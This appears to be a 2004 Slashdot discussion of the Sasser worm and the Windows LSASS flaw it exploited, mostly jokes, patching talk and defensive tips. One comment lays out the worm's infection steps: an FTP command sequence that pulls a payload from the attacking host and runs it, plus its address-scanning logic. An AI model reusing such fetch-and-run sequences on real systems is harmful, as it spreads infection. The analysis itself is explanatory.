New Windows Worm on the Loose 622
Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."
ah... (Score:5, Funny)
Re:ah... (Score:5, Funny)
-- I see your nat box and raise you a proxy server.
Re:ah... (Score:5, Interesting)
1999, the year MS forgot was was said back in 90.
2003, the year of Microsofts new security initiative.
2004, the year of the Windows worms.
XP SP2, the patch for mentioned "listening state" error.
Re:ah... (Score:3, Insightful)
Ah, actually, Microsoft tried a "new security initiative" back in 2001 as well, IIRC.
The 2003 one is the SECOND "new security initiative" - and seems to be shaping up as effective as the first, that is, nada, zip, zilch, useless, meaningless marketing bullshit.
Nice timeline you had there, though, really shows the Microsoft competence in perspective.
Re:ah... (Score:4, Insightful)
For starters, sendmail and wu-ftpd should have been banned from Earth a long time ago. They have more holes than swiss cheese. Telnetd should already have been deprecated by ssh, and should not be installed at all.
Re:ah... (Score:3, Funny)
Ha. I have a linux laptop behind a linux iptables NAT box behind another linux iptables NAT box. The NAT boxes are running two different distributions. Beat that if you can.
Re:ah... (Score:3, Funny)
Re:ah... (Score:5, Funny)
I have DOS - which doesn't listen to anything unless you tell it to.
Beat that.
(Well, I'm fibbing, I actually run Windows 2000, Windows XP and Red Hat 7.3. But I remember when I used to tell clients at BOFA that modem security was not an issue with DOS since if you weren't running XTalk or something, DOS could care less if the modem was on. Of course, this meant porn took a lot longer to download...)
Re:ah... (Score:3, Funny)
You are lucky. I have to use a box of gravel for a firewall.
Re:ah... (Score:3, Interesting)
Boy, am I lame!
Re:ah... (Score:4, Funny)
You could be doing SO much more with that much machine -- I mean....It's a PENTIUM 90!! Don't you realize how much power you have right there? It's insanity!
Re:ah... (Score:5, Insightful)
Re:ah... (Score:5, Funny)
LK
Re:ah... (Score:4, Funny)
My firewall is literally a burning wall, DDOS me and I get a large dinner
Re:ah... (Score:5, Insightful)
Yeah... till your buddy comes over to play Counterstrike and plugs into your hub infecting your machine.
Re:ah... (Score:5, Insightful)
Completely patched.
My stupidity was DMZing my firewall. Stupid, STUPID.
Freinds don't let freinds open their firewalls. Not even to play video games, no matter how many processes they have deactivated.
I think the tragedy here is that most "regular power users" (ie. the folks who think that they're big shit because they can install antivirus software and change their windows desktop) probably don't realize that it's entirely possible to have a completely patched windows machine that can still get infected by a virus if you plug it right into the internet. I honestly think these things are reaching a critical mass. It'll be interesting to see exactly how that manifests.
I Use X Windows (Score:5, Funny)
What is this 'Windows Update' of which you speak?
Re:I Use X Windows (Score:5, Funny)
"emerge sync; emerge -uD --fetchonly world; emerge -uD world; etc-update"
except that it requires you to reboot several times and repeatedly interact with it.
Re:I Use X Windows (Score:5, Insightful)
"emerge sync; emerge -uD --fetchonly world; emerge -uD world; etc-update"
isn't kludgy in the least and very intuitive. I prefer "apt-get dist-upgrade" myself.
Re:I Use X Windows (Score:5, Funny)
Re:I Use X Windows (Score:3, Interesting)
All that "emerge" stuff breaks Gentoo, sooner or later, every time I've tried it.
Re:I Use X Windows (Score:5, Interesting)
I don't use a Windows machine from the adminstrator account. When I need to run Update, I switch over and do it as the administrator. I read before I install, and I don't install nonapplicable updates. I don't trust anyone's automagic updaters.
When I've used Gentoo, it's been as a desktop machine. I've installed it 3, maybe 4, times, always building from the minimal install (the one that takes a day and a night, and most of the second day...). I don't much about and I don't install "foreign" software. Every time I've used Gentoo, it goes belly up after I've installed some update or another.
Gentoo may have an excellent packaging system, but I don't have time or energy or purpose to become an expert on one more proprietary packaging and updating scheme.
Linux touts "choice" all the time, and rightly so. But the fact is that having a plethora of distribution-specific packaging schemes is a major pain that limits choice.
So long as the Linux community fails to agree to, implement, and use a single packaging and updating scheme, Linux will be a nonstarter outside the geek and corporate worlds.
Re:I Use X Windows (Score:3, Funny)
Re:I Use X Windows (Score:4, Informative)
Re:I Use X Windows (Score:3, Funny)
Windows - Where do you want to go today?
Linux - Where do you want to go tomorrow?
BSD - Are you guys coming or what?
Re:I Use X Windows (Score:5, Informative)
SUS again updates only the OS + Office suite, so that doesn't cut it.
I would certainly prefer to wait a few hours for a test machine to compile a package and then be able to deploy it (binary) to all the machines after testing. It's all in the choice of design, Windows is still at heart a single user operating system, Linux, Unix, BSD, etc are all multi-user operating systems, and it is reflected in installs.
Re:I Use X Windows (Score:5, Funny)
Full text, in case of slashdotting:
Re:I Use X Windows (Score:5, Funny)
Those monopolistic bastards.
Re:I Use X Windows (Score:5, Funny)
yum --ask-lots-of-useless-questions=yes \
--reboot-for-no-apparent-reason=alot \
--resolve-dependencies-without-my-help=no \
update
Re:I Use X Windows (Score:3, Insightful)
"The X Consortium requests that the following names be used when referring to this software:
X
X Window System
X Version 11
X Window System, Version 11
X11
X Window System is a trademark of X Consortium, Inc. "
Re:I Use X Windows (Score:3, Funny)
Re:I Use X Windows (Score:5, Informative)
Mutex Trapping (Score:5, Interesting)
Mutexes are named consistently enough under Windows that I wish somebody would make a program that simply caught all attempts at gaining a mutex and popped up a dialog window if the mutex hadn't been seen before. This would stop most any new software from running without first checking with the user. This is no good for a server of course, but ideal for a workstation.
This would also be great for catching spyware crap installs, as well as things like the RealPlayer toolbar that keeps popping up adverts by default. Simply tell the mutex checker to decline the requested mutex from then on and it would have the mutex always fail from then on -- then those programs could never be run again.
Re:Mutex Trapping (Score:3, Interesting)
Why can't we have something that protects the registry and pops up whenever something wants to go into software/microsoft/windows/run, /runonce, runonceex, etc? 3/4 of the stuff that goes in there, I end up ripping out later. It's dumb that it's so easy for programs to install things there.
Re:Mutex Trapping (Score:5, Informative)
Make it impossible to write to HKLM/software/microsoft/windows/currentversion/ru
Re:Mutex Trapping (Score:5, Informative)
Re:Mutex Trapping (Score:5, Informative)
Access attempts will show up in the event viewer.
Note:use regedt32.exe for Win2000 or eariler. For later versions, regedit.exe does everything (under Edit->Permissions).
Re:Mutex Trapping (Score:5, Informative)
Note this only works on NT-based systems (e.g., WinXP)
Re:Mutex Trapping (Score:5, Informative)
Well, it doesn't protect the registry, but it does pop up a dialog box whenever something tries to add itself to those registry entries..
Re:Mutex Trapping (Score:5, Informative)
Re:Mutex Trapping (Score:5, Informative)
However, for most other types of spyware I completely agree, that would be an excellent idea for screening running processes.
Re:Mutex Trapping (Score:3, Informative)
Imagine running something complex like a database server. Dialog box fun.
The virus writers will just use something else, like a file, if people tracked by mutex.
Re:Mutex Trapping (Score:3, Insightful)
If there was a mutex checker/blocker program developed, you would just see worm authors switch to a different method of determining if their worm was already running, or randomize the mutex name.
Re:Mutex Trapping (Score:3, Insightful)
Of course. They're going to work around any countermeasure if it goes into popular use. Once upon a time, all programs were allowed to write to the entire filesystem. Remember
Huh? (Score:5, Funny)
A new worm?Oh, there it is.
Removal Instructions (Score:5, Informative)
http://www.microsoft.com/security/incident/sasser
Re:Removal Instructions [mirrors] (Score:5, Funny)
http://fedora.redhat.com [redhat.com]
http://www.gentoo.org [gentoo.org]
http://www.debian.org [debian.org]
http://www.linux-mandrake.com [linux-mandrake.com]
http://www.slackware.com [slackware.com]
Re:Removal Instructions (Score:5, Interesting)
Do you create all your HTML documents from scratch?
This worm release is pretty cool, I think. This is the first time I've got to see the patch deployment process I built with a couple of other people from my group send out patches to the entire company and get pretty much everybody taken care of before the worm was released. We built it from SMS SUS and a bunch of in-house components. 11,000 workstations across the country patched in less than a week, and we could have done it even faster in an emergency.
Regular SUS took care of our servers a week ago.
ah Nice, more work =) (Score:5, Funny)
Thanks Microsoft.
HAHA (Score:5, Funny)
The add server must be based on Microsoft's new Irony.NET framework!
Re:HAHA (Score:5, Insightful)
i realize you were mostly joking, but the fact is windows server cost of ownership IS lower because you don't need a smart person to run it. and since current viruses are not true malware, the fact that the machine is infected doesn't even matter to the cheap contractor admin "running" the box. as someone mentioned in another story's comment, it's time to make some REAL malware and wake these ijits up.
Re:HAHA (Score:5, Insightful)
They cause the computer to run really slow, and screw things up, including networking settings, killing IE, destroy the cryptography service, so that you can't get updates, and the ability to repair the TCP/IP layer.
When you get multiple viruses on a machine, they can cause it to not even startup--Especially the ones that try to shut down virus scanners (Gaobot).
I know they're not malware in the sense that they format your HD or anything, but when your server runs at 10% of it's normal speed, that's enough to take down almost any operation.
killing IE (Score:4, Funny)
Re:HAHA (Score:5, Funny)
And that, your honour, concludes my evidence showing why the Internet is such an insecure mess.
Blaster-style? Uh-oh. (Score:3, Interesting)
Re:Blaster-style? Uh-oh. (Score:4, Interesting)
Visit Windows Update? (Score:5, Funny)
Could you try to find out? (Score:4, Funny)
Dang... (Score:5, Funny)
Re:Dang... (Score:5, Funny)
Security Update Dates (Score:5, Insightful)
Re:Security Update Dates (Score:5, Insightful)
Re:Security Update Dates (Score:3, Insightful)
Re:Security Update Dates (Score:3, Informative)
YA Windows-only software title (Score:5, Funny)
Loose not lose (Score:5, Funny)
Same old, same old.... (Score:5, Insightful)
Seriously, hasn't MS learnt anything about the Internet yet? Why do they keep insisting to keep all of these ports open all the time? Why so many services running out of the box? Why can't people even close some of the listening ports?
If MS was any serious about security, they would have all ports closed be default. Or at least have a possiblity to closing them down during install.
How it works (Score:5, Informative)
It then connects to that shell, and executes the following commands (cleaned up to get past slasdot's junk filter):
open XXX.XXX.XXX.XXX 5554
anonymous
user
bin
get XXXXX_up.exe
bye
XXXXX_up.exe
If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:
The IP addresses generated by the worm are distributed as follows:
50% are completely random
25% have the same first octet as the IP
address of the infected host
25% have the same first and second octet as the IP address of the infected host.
The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.
See:
Bad Link...Here's the Correct One (Score:3, Informative)
Dammit... (Score:4, Interesting)
Re:Dammit... (Score:5, Interesting)
I use the "redirect" feature of the packet filter to do the equivalent of proxy transparency on ports 135,139,445,4444,9996 to local ports with a local listener.
The Sasser worm starts 128 scanning threads to pseuod-random destinations, and on a fast machine can really pump out the packets. If you give it something to talk to on ports 445 and 9996, that considerably slows the scanning behavior.
This close to removing win2k... (Score:3, Interesting)
1) IE won't work (joking aside it just doesn't work at all). This happened a long time ago, so I switched to mozilla. I thanks ms for this cause moz. owns.
2) Add/Remove programs, I can no longer see the text to describe the program install. It's all grey. An icon shows, so I can uninstall that way. Its not the colo scheme either, I tried MS default and it still didn't work.
3) I was having problems with this latest worm, but patching fixed everything, so now we wait to see what broke.
All and all I'm getting extremely close to wiping the HDD, and dual booting Slackware Linux (which has been on my laptop for over a year and I love it) and win98se for games. All the backups are current, and I'm waiting for the next problem to make the system more unsuable. If I wasn't so damn lazy, this would of been done sooner.
BrendanHelp the poor bastards (Score:5, Funny)
I consider it a public service. Maybe you can even deduct the bandwith for the upload from you tax.
Days like this... (Score:5, Funny)
(ring)
sigh....
some important points (Score:4, Informative)
Sasser generates traffic on TCP ports 445, 5554 and 9996.
The patch for the vulnerability (MS04-011) can be installed through Windows Update or located at the following URL:
http://www.microsoft.com/technet/security/bulle
Windows update freaking out! (Score:5, Funny)
and after some time, a windows pops up with the text:
"The software you are instaling has not passed the Windows Logo testing to verify its compatibility with Windows XP. bla bla bla"
"This software will *not be instaled*. Contact your system administrator."
Ok, so i contact myself, and wonders what the hell?!?
I just give M$ a lot of information about the operating system that i'm running... they wrote the frign thing, and even so, they don't know what will run in it, or what will pass their own crap compatibility verification!
but well, that's it... i just click "OK" --the only button-- and see the same windows appears 3 times more... and blissfuly keep my ignorance of what's going on with the instalation.
Re:Windows update freaking out! (Score:4, Funny)
"That action can not be performed. Please contact your system administrator."
I always felt like and idiot talking to myself...
Re:Windows update freaking out! (Score:5, Informative)
That's funny. (Score:3, Interesting)
I know linux is more secure, especially because of the multi-user system where root is only used for special reasons, and that many windows programs are integrated in the OS (IE, Outlook...), but how feasible WOULD it be to make worms for Linux? I really don't know. I do use Linux, and I love it. I only boot into windows for certain things such as Battlefield 1942...
Well done, submitter! (Score:5, Funny)
How refreshing. A Slashdot article about a worm exploiting Windows, without the usual childish jibes. Or FUD. Or spelling mistakes. Well done, Dynamoo!
Of course, then came the comments... :-)
I was wondering... (Score:5, Funny)
Linux_Zealot says : 5 Insightful - I am using Linux now !
M$_wizard : 5 Interesting - Worms always appear after a security notice from Microsoft Knowledge Base ; so, openness is bad !
security_Teacher : 5 Insightful - Of course, no one should run anything as root but cricital administration tasks, and a firewall is essential.
n00b : -1 Troll - Windows Sucks !!!
Well... That's just a little... repetitive
Re:I was wondering... (Score:5, Interesting)
It sure is. The last worm [securityfocus.com] wouldn't have worked without one.
Working at PC Club (Score:3, Funny)
This totally sucks. (Score:5, Interesting)
So for the past few days, I've had to live with part of my bandwidth getting chewed up by incoming packets that don't actually do anything but take up space. It effectively slowed the speed of downloads by about half. The rate of packets is starting to slow down now... finally (I guess as people patch their systems), but it still was highly annoying.
Anyways, I called my ISP when I first noticed it 3 days ago (after checking it with ethereal), and asked if they could help. They told me that this was caused by filesharing programs, which I knew wasn't the case becuase in fact the only port 445 stuff I've done is windows filesharing, and I've secured the one and only Windows system on my LAN against IP addresses other than other ones on my LAN from being able to access them. Needless to say, this answer did not impress me. Here I was, effectively being subjected to a DoS attack, and they are trying to tell me this is _my_ fault? Man, if I had any other choice for high speed internet, I'd be switching in a heartbeat.
Anyways, that's my story. Things like this totally bite because you can have a firewall and all the security precautions in the world, but worms like this still chew up your bandwidth.
I use the best anti virus on the market! (Score:4, Insightful)
Outside the firewall... (Score:5, Interesting)
If you wonder what a virus is : (Score:3, Funny)
Obligatory quote from Linux/*BSD/Mac users (Score:5, Funny)
Nelson, various Simpsons episodes
so thats why my /var/log/messages is so big today (Score:3, Interesting)
goodbye windows update (Score:5, Funny)
Using Symantec AV, I LiveUpdate'd signatures, only to find that it decared System32/w32sup.exe as a trojan and quarantined it.
Patching / Firewalls (Score:5, Insightful)
Should read "Of course, all good Slashdotters patch their systems and have a firewall, don't you?".
Running something other than Windows is not a good reason to ignore security.
Grounded (Score:4, Interesting)
I have to wonder...
Re:Why use windows update? (Score:3, Informative)
You must be an american (Score:5, Funny)
Re:Windows is a joke, but hey, smile. (Score:3, Informative)
In 2k and XP, you can
1- do nothing
2- Ask before downloading and before installing. (only admin users can say yes)
3- download updates automatically, but ask for installation (only admin users can install; they are asked if you they want to go ahead with the install)
4- automatically install at a fixed time (default 2 or
Re:Windows XP SP1 Fixed This! (Score:4, Informative)
Uh... what?
Buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code by causing long debug entries to be generated for the DCPROMO.LOG log file. [mitre.org] (emphasis mine)
Re:already feeling it on college campuses (Score:3, Funny)
Re:already feeling it on college campuses (Score:5, Insightful)
> absolutely no proprietary, closed source software would be
> allowed anywhere on my network, especially not the parts
> accessible to students
So, preventing your students from being unable to run Mathematica, Maple, Matlab, Visual Studio,... is educationally beneficial in what way?
Yes, closed source software has problems. So does open source. An all-out ban either way helps no one and solves nothing.
Re:Linux is vunerable too (The anti-anti-windows F (Score:5, Insightful)
Re:windows users never fail to amaze me. (Score:4, Insightful)
It attacks a genuine hole in the operating system and is not dependent on anyone even being logged on to the machine at all. It 'hijacks' the LSASS process, wich runs in the SYSTEM context. The operating system could not run if LSASS wasn't running as SYSTEM.
Of course, the patch has been available for >2 weeks now, so all of this *should* be moot.